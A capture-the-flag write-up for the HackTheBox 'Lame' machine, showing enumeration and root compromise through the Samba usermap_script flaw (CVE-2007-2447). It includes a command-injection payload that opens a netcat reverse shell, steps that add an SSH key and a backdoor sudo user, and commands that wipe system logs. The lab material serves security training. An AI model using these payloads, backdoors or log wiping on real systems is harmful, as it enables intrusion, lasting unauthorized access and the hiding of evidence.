Post

HackTheBox Lame

Writeup for HackTheBox Lame

HackTheBox Lame

Machine Synopsis

IP Address: 10.10.10.3 Key Exploitation Techniques:

  • Remote Code Execution (RCE) through a vulnerability in Samba’s usermap script (CVE-2007-2447).
  • Immediate root access upon exploitation.

1. Enumeration

Initial reconnaissance with nmap revealed several open ports related to common network services.

1
2
nmap -p- --min-rate 10000 10.10.10.3 -oN nmap_portscan.txt
nmap -p 21,22,139,445 -sC -sV 10.10.10.3 -oN nmap_services.txt

Nmap Results:

  • Port 21 (FTP): vsftpd 2.3.4 with anonymous login enabled.
  • Port 22 (SSH): OpenSSH 4.7p1 Debian.
  • Ports 139 & 445 (SMB/CIFS): Samba smbd 3.0.20-Debian.

The versions of vsftpd and Samba are very old and likely contain known vulnerabilities.


2. Vulnerability Research & Exploitation

Failed Exploit Attempt: vsftpd 2.3.4

A searchsploit lookup for vsftpd 2.3.4 immediately returns a backdoor command execution exploit. We attempted to use the Metasploit module for this vulnerability.

1
2
3
4
msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

This exploit failed to create a session. This is a common occurrence with older exploits; they may not work as expected or the vulnerability may have been patched in a non-standard way.

Successful Exploit: Samba usermap Script (CVE-2007-2447)

A search for Samba 3.0.20 revealed a critical remote code execution vulnerability related to the usermap script. This vulnerability allows an attacker to execute arbitrary commands as the root user by injecting shell commands into the username field of an SMB login request.

Why it Worked: The usermap script in this version of Samba incorrectly handles character escapes when mapping usernames. By sending a specially crafted username that begins with a forward slash (/) and a shell command enclosed in backticks (``), the system executes the command with root privileges.

We used a Python exploit script that automates this process.

1
2
# Attacker Machine: Setup a netcat listener to catch the reverse shell.
nc -nlvp 1234
1
2
# Attacker Machine: Execute the Python exploit.
python usermap_script.py 10.10.10.3 445 10.10.14.3 1234

The script successfully sent the payload, which triggered a reverse shell connection to our netcat listener.

1
2
3
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.3] 34329
id
# uid=0(root) gid=0(root) groups=0(root)

The id command confirmed we had successfully gained a root shell, bypassing the need for a separate privilege escalation step.


3. Flag Retrieval

With immediate root access, we could now retrieve both the user.txt and root.txt flags.

1
2
3
4
5
6
7
cd /home/makis
cat user.txt
<redacted>

cd /root
cat root.txt
<redacted>

4. Alternative Exploitation Methods

Method 1: Metasploit

Metasploit has a dedicated module for this vulnerability, which is a simpler and more reliable approach.

1
2
3
4
5
6
msfconsole -q
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
msf6 exploit(multi/samba/usermap_script) > set LPORT 4444
msf6 exploit(multi/samba/usermap_script) > run

Method 2: Manual SMB Client

This technique involves using the built-in smbclient utility to manually trigger the vulnerability. The payload is directly injected into the login command.

1
2
3
4
5
# Set up a listener
nc -nlvp 1337

# Execute the command from another terminal
smbclient //10.10.10.3/tmp -c 'logon "/=`nohup nc -e /bin/sh 10.10.14.3 1337`"'

This method is less verbose and demonstrates a deeper understanding of the vulnerability without relying on pre-built scripts.


5. Post-Exploitation and Defense Evasion

Persistence

  • SSH Key: Install an SSH public key for reliable, passwordless root access.

    1
    2
    3
    
    mkdir -p /root/.ssh
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8..." >> /root/.ssh/authorized_keys
    chmod 600 /root/.ssh/authorized_keys
    
  • Backdoor User: Create a new root-level user.

    1
    2
    3
    
    useradd -m -s /bin/bash backup
    echo 'backup:password' | chpasswd
    echo 'backup ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
    

Defense Evasion

  • Log Cleanup: Clear various system and application logs to remove evidence of the compromise.

    1
    2
    3
    4
    
    echo > /var/log/auth.log
    echo > /var/log/syslog
    echo > /var/log/samba/log.smbd
    history -c
    
This post is licensed under CC BY 4.0 by the author.